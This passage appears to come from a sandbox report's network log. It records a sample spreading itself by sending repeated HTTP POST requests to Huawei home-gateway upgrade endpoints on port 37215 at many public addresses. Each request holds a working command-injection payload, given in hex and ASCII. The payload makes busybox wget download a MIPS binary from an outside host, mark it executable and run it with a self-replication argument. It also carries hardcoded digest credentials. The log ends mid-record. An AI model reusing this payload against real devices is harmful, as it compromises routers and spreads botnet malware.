2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          604192.168.2.155654441.113.252.9537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604310036 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          605192.168.2.1556700197.87.203.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604387045 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          606192.168.2.1557818197.166.189.12837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604439974 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          607192.168.2.155374641.162.148.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604470015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          608192.168.2.1552640157.226.33.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604492903 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          609192.168.2.1559206138.42.6.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604504108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          610192.168.2.154926280.36.203.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604665041 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          611192.168.2.1549306197.55.120.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604681015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          612192.168.2.1548868197.253.91.18237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604690075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          613192.168.2.1554728186.141.20.15437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604724884 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          614192.168.2.1549646160.134.221.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.604762077 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
